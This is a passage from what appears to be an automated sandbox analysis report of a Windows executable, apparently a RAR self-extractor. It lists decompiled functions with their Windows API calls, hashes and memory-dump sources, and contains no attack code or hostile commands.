                                                                                    • Opcode ID: 95d4a2abe8640a4b5d71478c019322b4ee6744f70e88091f2cd69d4790564d0d
                                                                                    • Instruction ID: d6a72a6843e18a29f64dbd0ac422aa50a621cbffd4459c70ef865024935c9f25
                                                                                    • Opcode Fuzzy Hash: 95d4a2abe8640a4b5d71478c019322b4ee6744f70e88091f2cd69d4790564d0d
                                                                                    • Instruction Fuzzy Hash: 443128321083057FE325AB749C06F6BB7ACDF62324F20854AF514961C1EFB49919C7A6
                                                                                    Function 00167D96 Relevance: 12.1, APIs: 8, Instructions: 135windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00167DAF
                                                                                    • GetTickCount.KERNEL32 ref: 00167DCD
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00167DE3
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00167DF7
                                                                                    • TranslateMessage.USER32(?), ref: 00167E02
                                                                                    • DispatchMessageW.USER32(?), ref: 00167E0D
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00167EBD
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00167EC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4150546248-0
                                                                                    • Opcode ID: bb139a7d0d9e906cf9d4f1c6ceee1b2a42339d00a79e799def71350d511e7972
                                                                                    • Instruction ID: 713beaebb12cbfbe61afa01e53b631db8e53c47e2dee6c47c787c6efc16e1785
                                                                                    • Opcode Fuzzy Hash: bb139a7d0d9e906cf9d4f1c6ceee1b2a42339d00a79e799def71350d511e7972
                                                                                    • Instruction Fuzzy Hash: 2F416971208306AFD714DF65CC8896BBBE9EF48708B00086EF646C7290DB71EC59CB62
                                                                                    Function 0015FE20 Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 0015FE33
                                                                                      • Part of subcall function 0015A8E0: GetVersionExW.KERNEL32(?), ref: 0015A905
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0015FE5C
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0015FE6E
                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0015FE7B
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0015FE91
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0015FE9D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0015FED3
                                                                                    • __aullrem.LIBCMT ref: 0015FF5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                    • String ID:
                                                                                    • API String ID: 1247370737-0
                                                                                    • Opcode ID: f592e36fc48a1a87c1ee5f39067a59cc2cc8a3c65aee0e0e48b4cb5b938f4e9a
                                                                                    • Instruction ID: 0207369c1f7f85bd6aef4dbadb7b8ebf7efa32bcfe47ef743922e85498aff1c8
                                                                                    • Opcode Fuzzy Hash: f592e36fc48a1a87c1ee5f39067a59cc2cc8a3c65aee0e0e48b4cb5b938f4e9a
                                                                                    • Instruction Fuzzy Hash: D54138B24083099FC310DF65C8809ABF7F8FF88715F004A2EF99696650E735E649DB52
                                                                                    Function 0017C56D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0017CCE2,00000000,00000000,00000000,00000000,00000000,00172C4E), ref: 0017C5AF
                                                                                    • __fassign.LIBCMT ref: 0017C62A
                                                                                    • __fassign.LIBCMT ref: 0017C645
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0017C66B
                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0017CCE2,00000000,?,?,?,?,?,?,?,?,?,0017CCE2,00000000), ref: 0017C68A
                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0017CCE2,00000000,?,?,?,?,?,?,?,?,?,0017CCE2,00000000), ref: 0017C6C3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: d8f08acab16e8e144ce14f2ba788b16001835578bc0db72f673d2bbc36e5d4ec
                                                                                    • Instruction ID: 35df5b0762a832cbe5743116d83e99e599d0e120ac1b592e06873ffb77beb9de
                                                                                    • Opcode Fuzzy Hash: d8f08acab16e8e144ce14f2ba788b16001835578bc0db72f673d2bbc36e5d4ec
                                                                                    • Instruction Fuzzy Hash: 095191B5A002099FCB14CFA8D885AEEBBF4FF19310F15815EE559E7251E7309A80CFA1
                                                                                    Function 0016B0D9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0016B0EF
                                                                                    • _swprintf.LIBCMT ref: 0016B123
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • SetDlgItemTextW.USER32(?,00000066,00193122), ref: 0016B143
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0016B176
                                                                                    • EndDialog.USER32(?,00000001), ref: 0016B257
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                    • String ID: %s%s%u
                                                                                    • API String ID: 2892007947-1360425832
                                                                                    • Opcode ID: e6a9bcd1987abd5a381de5ef33fa6a4db8621c3dd5d1524e3eda6ec009a40bae
                                                                                    • Instruction ID: 36b7e858bf1398071db7cc22bc7b020914e5fc81aa8be4d37cc9978ca08c5a6c
                                                                                    • Opcode Fuzzy Hash: e6a9bcd1987abd5a381de5ef33fa6a4db8621c3dd5d1524e3eda6ec009a40bae
                                                                                    • Instruction Fuzzy Hash: 75416C72904219AEEF25DBA4DCC5EEE77BCEB19301F0040A6F919E6051EB709BD48F64
                                                                                    Function 0015C91F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                    • String ID: %08x
                                                                                    • API String ID: 1593746830-3682738293
                                                                                    • Opcode ID: 65f5f255e6b12e11c9fa2df007cecd70b21d7696ec10327f713b65fa80d2e151
                                                                                    • Instruction ID: b36f3565c724a1d83667de87a89fcd852bf494cf95b133026974b87e2d714397
                                                                                    • Opcode Fuzzy Hash: 65f5f255e6b12e11c9fa2df007cecd70b21d7696ec10327f713b65fa80d2e151
                                                                                    • Instruction Fuzzy Hash: D6411732904354EED731EA20CC49ABB67EDEB99711F11052AFD69AB182E7349D48C3A1
                                                                                    Function 0016859C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000), ref: 001685B5
                                                                                    • GetWindowRect.USER32(?,?), ref: 001685DA
                                                                                    • ShowWindow.USER32(?,00000005,?), ref: 00168671
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00168679
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0016868F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$RectText
                                                                                    • String ID: RarHtmlClassName
                                                                                    • API String ID: 3937224194-1658105358
                                                                                    • Opcode ID: a1d76ef67d135f637f7eb83d65d86e2a991df601f7ea27906728538d9568666c
                                                                                    • Instruction ID: fc37cbc14a7f49d9b23bc6f22e3226d7b03d4c8b0235df5fbae7c0c1bbf76262
                                                                                    • Opcode Fuzzy Hash: a1d76ef67d135f637f7eb83d65d86e2a991df601f7ea27906728538d9568666c
                                                                                    • Instruction Fuzzy Hash: FA31B032101304AFDB219F64DD88B5BBFA9FF48701F00455AFE09AA592DB70DA50CBA2
                                                                                    Function 0017930F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 001792D3: _free.LIBCMT ref: 001792FC
                                                                                    • _free.LIBCMT ref: 0017935D
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 00179368
                                                                                    • _free.LIBCMT ref: 00179373
                                                                                    • _free.LIBCMT ref: 001793C7
                                                                                    • _free.LIBCMT ref: 001793D2
                                                                                    • _free.LIBCMT ref: 001793DD
                                                                                    • _free.LIBCMT ref: 001793E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                    • Instruction ID: 9a1d1e29c11c6fa7727a6d6a2747e13f00ed9787918537c8929dfaddc287eabe
                                                                                    • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                    • Instruction Fuzzy Hash: 5F11C971A45B04FADA20BBB0CC47FCB77BDAF14714F808815B29DA6193DB75B9488650
                                                                                    Function 00170C14 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00170C0B,0016E662), ref: 00170C22
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00170C30
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00170C49
                                                                                    • SetLastError.KERNEL32(00000000,?,00170C0B,0016E662), ref: 00170C9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: e2a7e64de537ce4ca7f012f67dc9f9dc9a11b9961bae36dc1fe8ee3e30a85492
                                                                                    • Instruction ID: 2713f71f8b8b3bca3a5f4a547bba5a69d0eb2b314d27ab26852af5679b0faab0
                                                                                    • Opcode Fuzzy Hash: e2a7e64de537ce4ca7f012f67dc9f9dc9a11b9961bae36dc1fe8ee3e30a85492
                                                                                    • Instruction Fuzzy Hash: 05014733288311AEF72727B86C8A9272678EF187B4B70832BFA1C440E1EF614E405280
                                                                                    Function 0016C7FD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                    • API String ID: 0-1718035505
                                                                                    • Opcode ID: 38cb227e1b5fc04ff7086e774a3d8b5eed85a6f73438d333475686ec8c6a2ea2
                                                                                    • Instruction ID: b7782d27758715a68e39c5657007251a91a40eab53edd76995726b800ee2324d
                                                                                    • Opcode Fuzzy Hash: 38cb227e1b5fc04ff7086e774a3d8b5eed85a6f73438d333475686ec8c6a2ea2
                                                                                    • Instruction Fuzzy Hash: 4C012872B81232AB8FB11E715C856B727CC9F07796311403AE490D3500E711C9E5FBE2
                                                                                    Function 00160050 Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001600AE
                                                                                      • Part of subcall function 0015A8E0: GetVersionExW.KERNEL32(?), ref: 0015A905
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001600D0
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 001600EA
                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001600FB
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0016010B
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00160117
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                    • String ID:
                                                                                    • API String ID: 2092733347-0
                                                                                    • Opcode ID: 07f279daae1848ef0d7d522830dbb4cf2dd1a599dfb0b17e95cd15c3f6aa98b0
                                                                                    • Instruction ID: b31520e09c55954bea84f6c5fc585829363d87a29d5cdca37a8d1b206bb74681
                                                                                    • Opcode Fuzzy Hash: 07f279daae1848ef0d7d522830dbb4cf2dd1a599dfb0b17e95cd15c3f6aa98b0
                                                                                    • Instruction Fuzzy Hash: 1131F37A1083459BC745DFA5C8809ABB7F8BF98704F04491EFA99C3210E730E549CB2A
                                                                                    Function 00168206 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: d85c39313d08d9981d1a69cd48a119cf7eeee94e8e08c26d62fef911e1c5851b
                                                                                    • Instruction ID: 37ed1ca2fbda2dd69ab9e919f7e64795f32d8ca041cc45d04b568f830e18ca58
                                                                                    • Opcode Fuzzy Hash: d85c39313d08d9981d1a69cd48a119cf7eeee94e8e08c26d62fef911e1c5851b
                                                                                    • Instruction Fuzzy Hash: F821C87660050ABBD7586E10DC92F7B77ACAF54758B14472CFC089A202FB70DD65C790
                                                                                    Function 0015FB02 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0015FB07
                                                                                    • EnterCriticalSection.KERNEL32(00191E74,00000000,?,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF,?), ref: 0015FB15
                                                                                    • new.LIBCMT ref: 0015FB35
                                                                                    • new.LIBCMT ref: 0015FB6B
                                                                                    • LeaveCriticalSection.KERNEL32(00191E74,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF,?,00008000,?), ref: 0015FB8B
                                                                                    • LeaveCriticalSection.KERNEL32(00191E74,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF,?,00008000,?), ref: 0015FB96
                                                                                      • Part of subcall function 0015F930: InitializeCriticalSection.KERNEL32(000001A0,00191E74,00000000,?,?,0015FB88,00000020,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?), ref: 0015F969
                                                                                      • Part of subcall function 0015F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F973
                                                                                      • Part of subcall function 0015F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F983
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                    • String ID:
                                                                                    • API String ID: 3919453512-0
                                                                                    • Opcode ID: d704e8a1083484396ffd1f69472e1ae37c548e1270d73e41fa3b3c9f34dfe504
                                                                                    • Instruction ID: ae611c35033b504b14c2bf3a8988f11dbb6ab2650c928396c7c58bc3d4001b79
                                                                                    • Opcode Fuzzy Hash: d704e8a1083484396ffd1f69472e1ae37c548e1270d73e41fa3b3c9f34dfe504
                                                                                    • Instruction Fuzzy Hash: 7711C634A00312EBDB059BA8EC15B7D76B9EB48755F00013EFC25EB6D0DB708D468B91
                                                                                    Function 0017631F Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,0018CBE8,00172674,0018CBE8,?,?,00172213,?,?,0018CBE8), ref: 00176323
                                                                                    • _free.LIBCMT ref: 00176356
                                                                                    • _free.LIBCMT ref: 0017637E
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 0017638B
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 00176397
                                                                                    • _abort.LIBCMT ref: 0017639D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: ffb0c7ba670204d18d3f04eb42aea4892b05baf12f2eab684bcc834994aecac0
                                                                                    • Instruction ID: 1d4185d73721f13eb7d24a8b0121001d4ba79384df4299129fe672551d62e69b
                                                                                    • Opcode Fuzzy Hash: ffb0c7ba670204d18d3f04eb42aea4892b05baf12f2eab684bcc834994aecac0
                                                                                    • Instruction Fuzzy Hash: D5F02D36645F0027D71327346C4AB5A3637AFE17B1F35C114F62CA3191EF718841C261
                                                                                    Function 0016B820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 0016B86B
                                                                                    • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0016B881
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0016B89B
                                                                                    • SetDlgItemTextW.USER32(?,00000066), ref: 0016B8A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
